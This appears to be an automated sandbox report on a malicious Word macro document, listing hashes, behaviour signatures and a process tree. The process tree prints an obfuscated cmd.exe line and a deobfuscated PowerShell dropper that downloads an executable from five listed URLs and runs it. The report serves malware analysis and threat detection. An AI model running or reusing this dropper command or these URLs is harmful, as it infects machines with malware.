Overview

overview

10

Static

static

8

0bdb04d6ad...18.doc

windows7-x64

10

0bdb04d6ad...18.doc

windows10-2004-x64

10

Analysis

  • max time kernel
    118s
  • max time network
    118s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64arch:x86image:win7-20240419-enlocale:en-usos:windows7-x64system
  • submitted
    01/05/2024, 12:58

Sharing

Copy URL Twitter E-mail
Report Analysis Logs

General

  • Target

    0bdb04d6ade94309db5aa025d012ac7f_JaffaCakes118.doc

  • Size

    67KB

  • MD5

    0bdb04d6ade94309db5aa025d012ac7f

  • SHA1

    48302c12594e09eb8abe458523cfe04a9741b62e

  • SHA256

    c67d226da6e85679f17b75dc0d668fc59ccacd2503b35e5e18a1d8824a140333

  • SHA512

    7f3af4014ee89882bdfc26d2b4b8b35ad76611ff21307d2b2efa55b4822ff876b867957a98d42da893534e339737bfbb694fd3ead7f0f32fe3c25c8ac0ab19da

  • SSDEEP

    768:UpJcaUitGAlmrJpmxlzC+w99NBC+1on79royxoJ8v:UptJlmrJpmxlRw99NBC+anep

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://develoweb.net/1Fd3
exe.dropper

http://bahiacreativa.com/eu
exe.dropper

http://atlasbackground.com/f0x
exe.dropper

http://adams-moore.com/ep
exe.dropper

http://erush.nl/y

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 11 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\0bdb04d6ade94309db5aa025d012ac7f_JaffaCakes118.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1008
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2424
      • C:\Windows\SysWOW64\cmd.exe
        cmd /V^:O/C"s^e^t ^sN=^ ^ ^ ^ ^ ^ ^ ^}}^{hct^ac}^;^k^a^erb;rVS$^ me^tI^-ek^ovnI;)rVS^$ ^,^PRL^$(^eli^F^da^o^ln^w^oD^.sz^i$^{^yrt^{)Jf^O^$^ n^i^ PR^L$(hc^aer^of^;^'e^x^e.^'+G^sG$+^'\^'^+c^il^b^up^:vn^e^$=rVS$;'522'^ =^ ^Gs^G^$^;)'^@'(^til^p^S^.'^y/ln.^hsur^e//^:^p^tt^h@^p^e/^m^oc.er^oo^m^-s^m^ad^a//:^ptt^h^@x0f/m^oc.dnuorgkca^bs^a^lt^a//^:ptth@^u^e/^m^oc^.^avi^taerca^i^h^ab//^:^pt^t^h^@3^d^F^1/^t^en^.b^ewoleve^d//^:p^t^th^'=^JfO^$^;^tne^ilC^b^e^W^.t^eN^ ^tce^j^bo^-w^en^=^s^zi^$^ l^l^e^hsr^e^w^op&&^f^or /L %c ^in (3^38^;-^1^;0)d^o ^s^e^t 9^w^g=!9^w^g!!^sN:~%c,1!&&^if %c=^=^0 c^a^ll %9^w^g:~-^3^39%"
        2⤵
        • Process spawned unexpected child process
        • Suspicious use of WriteProcessMemory
        PID:2620
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell $izs=new-object Net.WebClient;$OfJ='http://develoweb.net/1Fd3@http://bahiacreativa.com/eu@http://atlasbackground.com/f0x@http://adams-moore.com/ep@http://erush.nl/y'.Split('@');$GsG = '225';$SVr=$env:public+'\'+$GsG+'.exe';foreach($LRP in $OfJ){try{$izs.DownloadFile($LRP, $SVr);Invoke-Item $SVr;break;}catch{}}
          3⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2996

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
            Filesize

            20KB

            MD5

            e3ac2a2e11ef73accd8d22a5de1a3b80

            SHA1

            d5137d9ed6cbe3fb3890f8b31b58743b37477215

            SHA256

            9105b545248baf30de2d7c37002c379a9daf63f3500d178ff978ce4a6c949ea7

            SHA512

            8f72e2193f297054ba7ecb62fd63f2f3d6e7c0e4fb71ab679171a800e3aa602f0989636928d5c3789861a10ef8690cc82b8fdc61a365378ae607f6f874c73c0b

            Download Submit

          • memory/1008-10-0x00000000006D0000-0x00000000007D0000-memory.dmp

            Filesize

            1024KB

            Download

          • memory/1008-2-0x0000000070D2D000-0x0000000070D38000-memory.dmp

            Filesize

            44KB

            Download

          • memory/1008-6-0x00000000006D0000-0x00000000007D0000-memory.dmp

            Filesize

            1024KB

            Download

          • memory/1008-11-0x00000000006D0000-0x00000000007D0000-memory.dmp

            Filesize

            1024KB

            Download

          • memory/1008-9-0x00000000006D0000-0x00000000007D0000-memory.dmp

            Filesize

            1024KB

            Download

          • memory/1008-0-0x000000002F691000-0x000000002F692000-memory.dmp

            Filesize

            4KB

            Download

          • memory/1008-8-0x00000000006D0000-0x00000000007D0000-memory.dmp

            Filesize

            1024KB

            Download

          • memory/1008-7-0x00000000006D0000-0x00000000007D0000-memory.dmp

            Filesize

            1024KB

            Download

          • memory/1008-19-0x0000000070D2D000-0x0000000070D38000-memory.dmp

            Filesize

            44KB

            Download

          • memory/1008-20-0x00000000006D0000-0x00000000007D0000-memory.dmp

            Filesize

            1024KB

            Download

          • memory/1008-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

            Download

          • memory/1008-35-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

            Download

          • memory/1008-36-0x0000000070D2D000-0x0000000070D38000-memory.dmp

            Filesize

            44KB

            Download